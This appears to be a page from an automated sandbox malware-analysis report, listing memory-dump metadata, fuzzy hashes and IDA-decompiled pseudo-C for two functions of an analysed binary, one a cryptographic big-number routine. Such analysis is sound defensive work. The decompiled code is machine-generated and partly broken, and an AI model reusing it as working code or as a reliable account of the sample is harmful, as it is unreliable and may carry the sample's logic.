                                                                                                                            0x25bf8a69b6a
                                                                                                                            0x25bf8a69b7e
                                                                                                                            0x25bf8a69b84
                                                                                                                            0x25bf8a69b8d
                                                                                                                            0x25bf8a69b8f
                                                                                                                            0x25bf8a69ba3
                                                                                                                            0x25bf8a69bc4
                                                                                                                            0x25bf8a69bc9
                                                                                                                            0x25bf8a69bcc
                                                                                                                            0x25bf8a69bd6
                                                                                                                            0x25bf8a69be7
                                                                                                                            0x25bf8a69bf3
                                                                                                                            0x25bf8a69c19

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 18b8dc6c07b5b1a58e843c88cdd1a76dc6639984c07dc6614f9d507bdddf9ec5
                                                                                                                            • Instruction ID: f121dc4e2d767118da8b58a3605247d6e851543a15bf6e84250454b9ad4a3bcb
                                                                                                                            • Opcode Fuzzy Hash: 18b8dc6c07b5b1a58e843c88cdd1a76dc6639984c07dc6614f9d507bdddf9ec5
                                                                                                                            • Instruction Fuzzy Hash: 6CF1A663314E4282EF22CB15EC9C3AE63A1F7947A5F682115FA4987E8DEF34C905CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6916C Relevance: .4, Instructions: 366COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E0000025B25BF8A6916C(void* __ecx, void* __edx, void* __eflags, void* __rax, signed long long __rcx, long long __rdx, long long __r8, long long __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t124;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t153;
				void* _t154;
				void* _t156;
				signed int _t160;
				void* _t189;
				signed int _t193;
				signed int _t207;
				void* _t229;
				void* _t241;
				void* _t265;
				signed long long _t268;
				signed long long _t269;
				signed long long _t276;
				signed long long _t278;
				void* _t280;
				long long _t281;
				signed long long _t304;
				void* _t352;
				void* _t359;
				void* _t362;
				void* _t363;
				signed long long _t364;
				void* _t379;
				void* _t380;
				long long _t381;
				long long* _t384;
				long long* _t385;
				void* _t388;

				_t189 = __edx;
				_t362 = _t363 - 0x17a8;
				E0000025B25BF8A7A9C0(0x18a8, __rax, _t379, _t380);
				_t364 = _t363 - __rax;
				_t268 =  *0xf8a9c990; // 0x18002eb3c
				_t269 = _t268 ^ _t364;
				 *(_t362 + 0x1790) = _t269;
				 *(_t364 + 0x38) = __rcx;
				 *((long long*)(_t362 - 0x80)) = __r9;
				_t381 = __r8;
				 *((long long*)(_t364 + 0x20)) = __r8;
				 *((long long*)(_t364 + 0x58)) = __rdx;
				_t124 = E0000025B25BF8A66C64(__rdx);
				if (_t124 - 7 > 0) goto 0xf8a691c9;
				goto 0xf8a6920d;
				if (_t124 - 0x24 > 0) goto 0xf8a691d5;
				goto 0xf8a6920d;
				if (_t124 - 0x8c > 0) goto 0xf8a691e3;
				goto 0xf8a6920d;
				if (_t124 - 0x1c2 > 0) goto 0xf8a691f1;
				goto 0xf8a6920d;
				if (_t124 - 0x517 > 0) goto 0xf8a691ff;
				goto 0xf8a6920d;
				dil = _t124 - 0xdc9 > 0;
				if (E0000025B25BF8A666B8(_t269, _t362 - 0x58, __rdx) != 0) goto 0xf8a6965a;
				_t8 = _t352 - 1; // 0x5
				r13d = _t8;
				_t9 = _t269 + 1; // 0x1
				r15d = _t9;
				_t10 = _t269 + 1; // 0x1
				r14d = _t10;
				r15d = r15d << r13d;
				r14d = r14d << 7;
				_t160 = r15d;
				if (r15d - r14d >= 0) goto 0xf8a6925e;
				if (E0000025B25BF8A666B8(_t362 - 0x70, _t362 - 0x70 + (_t160 + _t160 * 2) * 8, __rdx) != 0) goto 0xf8a6929f;
				if (_t160 + 1 - r14d < 0) goto 0xf8a6923d;
				_t127 = E0000025B25BF8A666B8(_t362 - 0x70, _t364 + 0x68, __rdx);
				if (_t127 != 0) goto 0xf8a69624;
				if ( *((intOrPtr*)(_t362 + 0x1810)) != _t127) goto 0xf8a692d7;
				_t328 = __r8;
				_t128 = E0000025B25BF8A6B4D8( *((intOrPtr*)(_t362 + 0x1810)) - _t127, _t280, _t364 + 0x68, __r8, _t359, _t362, __r9);
				if (_t128 != 0) goto 0xf8a6961a;
				_t360 = E0000025B25BF8A6B384;
				 *((long long*)(_t364 + 0x28)) = E0000025B25BF8A6B384;
				goto 0xf8a692fa;
				_t229 = r15d - _t128;
				if (_t229 >= 0) goto 0xf8a692c7;
				_t129 = E0000025B25BF8A67578(_t128, _t362 - 0x70 + (r15d + r15d * 2) * 8, _t328);
				_t281 = _t280 - 1;
				if (_t229 != 0) goto 0xf8a692b6;
				E0000025B25BF8A67578(_t129, _t362 - 0x58, _t328);
				goto 0xf8a6965a;
				if (E0000025B25BF8A6B514(7, _t229, r15d, _t281, _t381, _t364 + 0x68, E0000025B25BF8A6B384, _t362, _t379) != 0) goto 0xf8a6961a;
				 *((long long*)(_t364 + 0x28)) = E0000025B25BF8A6B580;
				if (E0000025B25BF8A67AAC(7, _t189, E0000025B25BF8A6B514(7, _t229, r15d, _t281, _t381, _t364 + 0x68, E0000025B25BF8A6B384, _t362, _t379), _t281,  *(_t364 + 0x38), _t381, E0000025B25BF8A6B384, _t362, _t362 - 0x58) != 0) goto 0xf8a6961a;
				if (E0000025B25BF8A66480(_t281, _t362 - 0x58, _t362 - 0x70 + (r15d + r15d * 2) * 8) != 0) goto 0xf8a6961a;
				if (r13d <= 0) goto 0xf8a69378;
				if (E0000025B25BF8A66630(_t362 - 0x70 + (r15d + r15d * 2) * 8, _t362 - 0x70 + (r15d + r15d * 2) * 8, _t362 - 0x58) != 0) goto 0xf8a6961a;
				if ( *((intOrPtr*)(_t364 + 0x28))() != 0) goto 0xf8a6961a;
				if (1 - r13d < 0) goto 0xf8a69341;
				_t39 = _t388 + 1; // 0x2
				_t207 = _t39;
				if (_t207 - r14d >= 0) goto 0xf8a693df;
				_t40 = _t360 - 1; // 0x1
				r12d = _t40;
				_t276 = r12d;
				if (E0000025B25BF8A6743C(_t281, _t362 - 0x70 + (_t276 + _t276 * 2) * 8, _t362 - 0x58, E0000025B25BF8A6B384, _t362 - 0x70 + (_t207 + _t207 * 2) * 8) != 0) goto 0xf8a6961a;
				if ( *((intOrPtr*)(_t364 + 0x28))() != 0) goto 0xf8a6961a;
				r12d = r12d + 1;
				if (_t207 + 1 - r14d < 0) goto 0xf8a69385;
				_t241 = E0000025B25BF8A666B8(_t276, _t364 + 0x40,  *((intOrPtr*)(_t364 + 0x20)));
				if (_t241 != 0) goto 0xf8a6961a;
				_t56 = _t276 + 1; // 0x1
				E0000025B25BF8A67FD4(_t56, _t241, _t364 + 0x40);
				r12d = 0;
				r8d = 0;
				_t59 = _t281 + 1; // 0x1
				r9d = _t59;
				r13d = 0;
				_t304 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 0x58)))) - 1;
				 *(_t364 + 0x38) = _t304;
				goto 0xf8a69427;
				r9d = r9d - 1;
				 *((intOrPtr*)(_t364 + 0x30)) = r9d;
				if (_t241 != 0) goto 0xf8a69456;
				if (_t304 == 0xffffffff) goto 0xf8a6957f;
				r9d = 0x1c;
				r8d =  *( *((intOrPtr*)( *((intOrPtr*)(_t364 + 0x58)) + 0x10)) + _t304 * 4);
				 *((intOrPtr*)(_t364 + 0x30)) = r9d;
				 *(_t364 + 0x38) = _t304 - 1;
				r8d = r8d + r8d;
				 *(_t364 + 0x60) = r8d;
				_t193 = r8d >> 0x0000001b & 0x00000001;
				if (r12d != 0) goto 0xf8a69470;
				if (_t193 == 0) goto 0xf8a69422;
				if (r12d != 1) goto 0xf8a694b5;
				if (_t193 != 0) goto 0xf8a694b5;
				if (E0000025B25BF8A66630(_t364 + 0x40, _t364 + 0x40, _t364 + 0x68) != 0) goto 0xf8a69610;
				if ( *((intOrPtr*)(_t364 + 0x28))() != 0) goto 0xf8a69610;
				goto 0xf8a6956b;
				r12d = 2;
				r13d = r13d | _t193 << 6;
				if (1 != 7) goto 0xf8a69427;
				_t384 =  *((intOrPtr*)(_t364 + 0x28));
				if (7 <= 0) goto 0xf8a6951e;
				_t78 = _t364 + 0x40; // 0x42
				_t79 = _t364 + 0x40; // 0x42
				if (E0000025B25BF8A66630(_t79, _t78, _t364 + 0x68) != 0) goto 0xf8a69610;
				if ( *_t384() != 0) goto 0xf8a69610;
				if (1 - 7 < 0) goto 0xf8a694e3;
				_t278 = r13d;
				_t84 = _t364 + 0x40; // 0x42
				_t89 = _t364 + 0x40; // 0x42
				if (E0000025B25BF8A6743C(_t281, _t89, _t362 - 0x70 + (_t278 + _t278 * 2) * 8, E0000025B25BF8A6B384, _t84) != 0) goto 0xf8a69610;
				_t91 = _t364 + 0x68; // 0x6a
				if ( *_t384() != 0) goto 0xf8a69610;
				_t93 = _t278 + 1; // 0x1
				r12d = _t93;
				r13d = 0;
				r8d =  *(_t364 + 0x60);
				r9d =  *((intOrPtr*)(_t364 + 0x30));
				goto 0xf8a69422;
				if (r12d != 2) goto 0xf8a69600;
				if (0 <= 0) goto 0xf8a69600;
				if (0 <= 0) goto 0xf8a69600;
				_t385 =  *((intOrPtr*)(_t364 + 0x28));
				if (E0000025B25BF8A66630(_t364 + 0x40, _t364 + 0x40, _t91) != 0) goto 0xf8a69610;
				if ( *_t385() != 0) goto 0xf8a69610;
				r13d = r13d + r13d;
				if ((r13d & r14d) == 0) goto 0xf8a695fa;
				if (E0000025B25BF8A6743C(_t281, _t364 + 0x40, _t362 - 0x58, E0000025B25BF8A6B384, _t364 + 0x40) != 0) goto 0xf8a69610;
				if ( *_t385() != 0) goto 0xf8a69610;
				if (1 < 0) goto 0xf8a69594;
				_t351 =  *((intOrPtr*)(_t362 - 0x80));
				_t153 = E0000025B25BF8A69038(_t152, _t364 + 0x40,  *((intOrPtr*)(_t362 - 0x80)));
				_t113 = _t364 + 0x40; // 0x42
				_t154 = E0000025B25BF8A67578(_t153, _t113,  *((intOrPtr*)(_t362 - 0x80)));
				_t114 = _t364 + 0x68; // 0x6a
				_t156 = E0000025B25BF8A67578(E0000025B25BF8A67578(_t154, _t114,  *((intOrPtr*)(_t362 - 0x80))), _t362 - 0x58,  *((intOrPtr*)(_t362 - 0x80)));
				_t265 = r15d - r14d;
				if (_t265 >= 0) goto 0xf8a69658;
				r14d = r14d - r15d;
				E0000025B25BF8A67578(_t156, _t362 - 0x70 + (r15d + r15d * 2) * 8,  *((intOrPtr*)(_t362 - 0x80)));
				if (_t265 != 0) goto 0xf8a69647;
				return E0000025B25BF8A81A50(6, _t281,  *(_t362 + 0x1790) ^ _t364, _t351, _t362 - 0x70 + (r15d + r15d * 2) * 8 + 0x18, E0000025B25BF8A6B384 - 1, _t362, _t385);
			}








































                                                                                                                            0x25bf8a6916c
                                                                                                                            0x25bf8a69179
                                                                                                                            0x25bf8a69186
                                                                                                                            0x25bf8a6918b
                                                                                                                            0x25bf8a6918e
                                                                                                                            0x25bf8a69195
                                                                                                                            0x25bf8a69198
                                                                                                                            0x25bf8a6919f
                                                                                                                            0x25bf8a691a7
                                                                                                                            0x25bf8a691ab
                                                                                                                            0x25bf8a691ae
                                                                                                                            0x25bf8a691b3
                                                                                                                            0x25bf8a691b8
                                                                                                                            0x25bf8a691c0
                                                                                                                            0x25bf8a691c7
                                                                                                                            0x25bf8a691cc
                                                                                                                            0x25bf8a691d3
                                                                                                                            0x25bf8a691da
                                                                                                                            0x25bf8a691e1
                                                                                                                            0x25bf8a691e8
                                                                                                                            0x25bf8a691ef
                                                                                                                            0x25bf8a691f6
                                                                                                                            0x25bf8a691fd
                                                                                                                            0x25bf8a69206
                                                                                                                            0x25bf8a69218
                                                                                                                            0x25bf8a6921e
                                                                                                                            0x25bf8a6921e
                                                                                                                            0x25bf8a69222
                                                                                                                            0x25bf8a69222
                                                                                                                            0x25bf8a69226
                                                                                                                            0x25bf8a69226
                                                                                                                            0x25bf8a6922d
                                                                                                                            0x25bf8a69232
                                                                                                                            0x25bf8a69235
                                                                                                                            0x25bf8a6923b
                                                                                                                            0x25bf8a69255
                                                                                                                            0x25bf8a6925c
                                                                                                                            0x25bf8a69263
                                                                                                                            0x25bf8a6926c
                                                                                                                            0x25bf8a69278
                                                                                                                            0x25bf8a6927f
                                                                                                                            0x25bf8a69282
                                                                                                                            0x25bf8a6928b
                                                                                                                            0x25bf8a69291
                                                                                                                            0x25bf8a69298
                                                                                                                            0x25bf8a6929d
                                                                                                                            0x25bf8a6929f
                                                                                                                            0x25bf8a692a2
                                                                                                                            0x25bf8a692b9
                                                                                                                            0x25bf8a692c2
                                                                                                                            0x25bf8a692c5
                                                                                                                            0x25bf8a692cb
                                                                                                                            0x25bf8a692d2
                                                                                                                            0x25bf8a692e8
                                                                                                                            0x25bf8a692f5
                                                                                                                            0x25bf8a6930f
                                                                                                                            0x25bf8a69334
                                                                                                                            0x25bf8a6933f
                                                                                                                            0x25bf8a69350
                                                                                                                            0x25bf8a6936b
                                                                                                                            0x25bf8a69376
                                                                                                                            0x25bf8a69378
                                                                                                                            0x25bf8a69378
                                                                                                                            0x25bf8a6937f
                                                                                                                            0x25bf8a69381
                                                                                                                            0x25bf8a69381
                                                                                                                            0x25bf8a69390
                                                                                                                            0x25bf8a693b4
                                                                                                                            0x25bf8a693cf
                                                                                                                            0x25bf8a693d7
                                                                                                                            0x25bf8a693dd
                                                                                                                            0x25bf8a693eb
                                                                                                                            0x25bf8a693ed
                                                                                                                            0x25bf8a693f3
                                                                                                                            0x25bf8a693fb
                                                                                                                            0x25bf8a69405
                                                                                                                            0x25bf8a6940a
                                                                                                                            0x25bf8a69411
                                                                                                                            0x25bf8a69411
                                                                                                                            0x25bf8a69415
                                                                                                                            0x25bf8a69418
                                                                                                                            0x25bf8a6941b
                                                                                                                            0x25bf8a69420
                                                                                                                            0x25bf8a69427
                                                                                                                            0x25bf8a6942a
                                                                                                                            0x25bf8a6942f
                                                                                                                            0x25bf8a69435
                                                                                                                            0x25bf8a6943f
                                                                                                                            0x25bf8a69445
                                                                                                                            0x25bf8a6944c
                                                                                                                            0x25bf8a69451
                                                                                                                            0x25bf8a69459
                                                                                                                            0x25bf8a6945f
                                                                                                                            0x25bf8a69464
                                                                                                                            0x25bf8a6946a
                                                                                                                            0x25bf8a6946e
                                                                                                                            0x25bf8a69474
                                                                                                                            0x25bf8a69478
                                                                                                                            0x25bf8a6948d
                                                                                                                            0x25bf8a694aa
                                                                                                                            0x25bf8a694b0
                                                                                                                            0x25bf8a694b9
                                                                                                                            0x25bf8a694c8
                                                                                                                            0x25bf8a694d2
                                                                                                                            0x25bf8a694d8
                                                                                                                            0x25bf8a694e1
                                                                                                                            0x25bf8a694e3
                                                                                                                            0x25bf8a694e8
                                                                                                                            0x25bf8a694f6
                                                                                                                            0x25bf8a69512
                                                                                                                            0x25bf8a6951c
                                                                                                                            0x25bf8a6951e
                                                                                                                            0x25bf8a69525
                                                                                                                            0x25bf8a69532
                                                                                                                            0x25bf8a69540
                                                                                                                            0x25bf8a6954b
                                                                                                                            0x25bf8a6955c
                                                                                                                            0x25bf8a69564
                                                                                                                            0x25bf8a69564
                                                                                                                            0x25bf8a69568
                                                                                                                            0x25bf8a69570
                                                                                                                            0x25bf8a69575
                                                                                                                            0x25bf8a6957a
                                                                                                                            0x25bf8a69583
                                                                                                                            0x25bf8a69587
                                                                                                                            0x25bf8a6958d
                                                                                                                            0x25bf8a6958f
                                                                                                                            0x25bf8a695a7
                                                                                                                            0x25bf8a695bf
                                                                                                                            0x25bf8a695c1
                                                                                                                            0x25bf8a695c7
                                                                                                                            0x25bf8a695e0
                                                                                                                            0x25bf8a695f8
                                                                                                                            0x25bf8a695fe
                                                                                                                            0x25bf8a69600
                                                                                                                            0x25bf8a69609
                                                                                                                            0x25bf8a69610
                                                                                                                            0x25bf8a69615
                                                                                                                            0x25bf8a6961a
                                                                                                                            0x25bf8a69628
                                                                                                                            0x25bf8a6962d
                                                                                                                            0x25bf8a69630
                                                                                                                            0x25bf8a69639
                                                                                                                            0x25bf8a6964a
                                                                                                                            0x25bf8a69656
                                                                                                                            0x25bf8a6967c

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 513b23b7baf28647798e21d3b085801eaa99bec09bbee1beb230918fb9cff029
                                                                                                                            • Instruction ID: 5c370684c67384ebb47c4fbaee49b4921e2d1668953306736520da4d17145667
                                                                                                                            • Opcode Fuzzy Hash: 513b23b7baf28647798e21d3b085801eaa99bec09bbee1beb230918fb9cff029
                                                                                                                            • Instruction Fuzzy Hash: 6BE1E477304E4291EF229B24DC9C3AE63A0F7947A9FA42111FA4E87E9DEB34C905C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01311665 Relevance: .3, Instructions: 281COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 247319358c038e22e061152b01d0e2a403c95652048eb8f080668f1ebf498432
                                                                                                                            • Instruction ID: 93ffbc319a0a475e747ac3d43ee68d02e00c750a113acc03670e094978f82d2f
                                                                                                                            • Opcode Fuzzy Hash: 247319358c038e22e061152b01d0e2a403c95652048eb8f080668f1ebf498432
                                                                                                                            • Instruction Fuzzy Hash: 7371ADA3B182F853FA08CAB5A4009F85A58E356FD8B095511EF7F27F4DD679CA06D304
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01304780 Relevance: .2, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6d79ce6045190f72de4ec14cf8293b4e582305cef3069c6d8efa86c8a6a01251
                                                                                                                            • Instruction ID: 26d9f90c6a09a790bcea94c685bc128efcb7d28c124237c0089c98ad19abf3ae
                                                                                                                            • Opcode Fuzzy Hash: 6d79ce6045190f72de4ec14cf8293b4e582305cef3069c6d8efa86c8a6a01251
                                                                                                                            • Instruction Fuzzy Hash: 53A1BC72204B88C5EB52DF29E05036AB7E4F755B8CF489426CB8D17BA8DF79C286C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01324AC0 Relevance: .2, Instructions: 213COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 32%
                                                                                                                            			E01324AC0(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __edi, unsigned long long __rax, unsigned int __rbx, signed int __rcx, long long __rbp, void* __r13, void* __r14, void* __r15, unsigned long long _a8, unsigned int _a16, signed int _a24) {
				char _v8;
				long long _v16;
				signed long long _v24;
				unsigned long long _v32;
				unsigned int _v40;
				unsigned long long _v48;
				long long _v56;
				unsigned long long _v64;
				signed long long _v72;
				signed long long _v80;
				long long _v88;
				signed long long _v96;
				signed long long _v104;
				void* _t112;
				void* _t113;
				void* _t117;
				void* _t118;
				signed int _t120;
				signed int _t129;
				unsigned long long _t144;
				signed long long _t148;
				signed long long _t150;
				long long _t153;
				signed long long _t155;
				long long _t159;
				long long _t161;
				signed long long _t176;
				long long _t177;
				signed long long _t181;
				long long _t183;
				long long _t186;
				unsigned long long _t192;
				signed long long _t193;
				signed long long _t194;
				long long _t195;
				unsigned long long _t201;
				unsigned long long _t202;
				unsigned long long _t203;
				signed long long _t204;
				signed long long _t219;
				signed long long _t220;
				unsigned long long _t227;
				unsigned long long _t229;

				L0:
				while(1) {
					L0:
					_t232 = __r14;
					_t212 = __rbp;
					_t167 = __rcx;
					_t163 = __rbx;
					_t144 = __rax;
					_t127 = __edx;
					_t110 = __eax;
					if( &_v8 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L24;
					}
					L1:
					_v8 = __rbp;
					_t212 =  &_v8;
					_a24 = __rcx;
					_a16 = __rbx;
					_a8 = __rax;
					_t167 = __rcx << 0xd;
					_t219 = 0 + __rbx >> 0x16;
					_t201 = __rbx + _t167 + 0xffffffff;
					_t229 = _t201;
					_t202 = _t201 >> 0x16;
					_t120 = __ebx & 0x003fffff;
					_t163 = __rbx >> 0xd;
					_v32 = _t163;
					_t129 = __edi & 0x003fffff;
					_t192 = __rbx + _t167 - 1 >> 0xd;
					if(_t202 == 0) {
						L4:
						if(0 >= 0x2000) {
							L7:
							_t124 = 0x2000;
							E013588E0();
							goto L8;
						} else {
							L5:
							_t183 =  *((intOrPtr*)(__rax + 0x5d6dde0));
							_v16 = _t183;
							r8d = r8d & 0x00001fff;
							_v72 = 0;
							_v80 = _t192 - _t163 + 1;
							_t159 = _t183 + (_t219 << 7) + 0x40;
							_t117 = E01327440(__eax, __ecx, __edx, _t129, _t159, _t163, _t192 - _t163 + 1,  &_v8, __r14);
							_v88 = _t159;
							_t113 = E01327B60(_t117, __ecx, _t129, _v72 + _v16, _v32, _v80,  &_v8, __r14);
							_t155 = _v88;
						}
					} else {
						L2:
						_t227 = 0 >> 0x23;
						if(0 >= 0x2000) {
							L23:
							_t144 = _t227;
							E013588E0();
							goto L24;
						} else {
							L3:
							_v40 = _t229;
							_v48 = _t192;
							_v56 = 0;
							_v64 = _t202;
							_t186 =  *((intOrPtr*)(__rax + 0x5d6dde0));
							_v16 = _t186;
							r8d = r8d & 0x00001fff;
							_v72 = 0;
							_t27 = _t163 - 0x200; // -512
							_v80 =  ~_t27;
							_t161 = _t186 + (_t219 << 7) + 0x40;
							_t118 = E01327440(__eax, __ecx, __edx, _t129, _t161, _t163,  ~_t27,  &_v8, __r14);
							_v88 = _t161;
							_t163 = _v32;
							_t167 = _v80;
							_t110 = E01327B60(_t118, __ecx, _t129, _v72 + _v16, _t163, _t167,  &_v8, __r14);
							_t176 = _v56 + 1;
							_t203 = _a8;
							_t193 = _v64;
							_t220 = _v88;
							L9:
							_v104 = _t220;
							if(_t176 >= _t193) {
								L13:
								_t148 = _v40 >> 0x23;
								if(_t148 >= 0x2000) {
									L15:
									_t124 = 0x2000;
									E013588E0();
									goto L16;
								} else {
									L14:
									_t177 =  *((intOrPtr*)(_t203 + 0x78 + _t148 * 8));
									_v16 = _t177;
									_t194 = _t193 << 7;
									_v72 = _t194;
									_t153 = _t177 + _t194 + 0x40;
									_v80 = _v48 + 1;
									_t112 = E01327440(_t110, _t124, _t127, _t129 & 0x00001fff, _t153, _t163, _v48 + 1, _t212, _t232);
									_v88 = _t153;
									_t120 = 0;
									_t113 = E01327B60(_t112, _t124, _t129 & 0x00001fff, _v72 + _v16, _t163, _v80, _t212, _t232);
									_t155 = _v104 + _v88;
								}
							} else {
								L10:
								_t150 = _t176 >> 0xd;
								if(_t150 >= 0x2000) {
									L22:
									E013588E0();
									goto L23;
								} else {
									L11:
									_v96 = _t176;
									_t195 =  *((intOrPtr*)(_t203 + 0x78 + _t150 * 8));
									_v16 = _t195;
									_t127 = _t127 & 0x00001fff;
									_t181 = _t176 << 7;
									_v72 = _t181;
									_t148 = _t195 + _t181 + 0x40;
									_v24 = _t148;
									_t124 = 0x200;
									E01327440(_t110, 0x200, _t127, _t129, _t148, _t163, _t167, _t212, _t232);
									_t176 = _v104 + _t148;
									_t203 = _v72 + _v16;
									L17:
									if(_t148 < 8) {
										L16:
										 *((long long*)(_t203 + _t148 * 8)) = 0xffffffff;
										_t148 = _t148 + 1;
										goto L17;
									}
									L18:
									L12:
									_t204 = _v24;
									_t110 = 0;
									L20:
									while(_t148 < 8) {
										 *((long long*)(_t204 + _t148 * 8)) = 0;
										_t148 = _t148 + 1;
									}
									L8:
									_t227 = _v96 + 1;
									_t203 = _a8;
									_t193 = _v64;
									_t220 = _t176;
									_t176 = _t227;
									goto L9;
								}
							}
						}
					}
					L6:
					_v104 = _t155;
					return E013244E0(_t113, _t120, _t127, _a8, _a16, _a24, _t212, _t232);
					L25:
					L24:
					_a8 = _t144;
					_a16 = _t163;
					_a24 = _t167;
					E01356200(_t176, _t212);
				}
			}














































                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac0
                                                                                                                            0x01324ac9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01324acf
                                                                                                                            0x01324ad6
                                                                                                                            0x01324ade
                                                                                                                            0x01324ae6
                                                                                                                            0x01324aee
                                                                                                                            0x01324af6
                                                                                                                            0x01324b00
                                                                                                                            0x01324b24
                                                                                                                            0x01324b32
                                                                                                                            0x01324b35
                                                                                                                            0x01324b38
                                                                                                                            0x01324b3c
                                                                                                                            0x01324b42
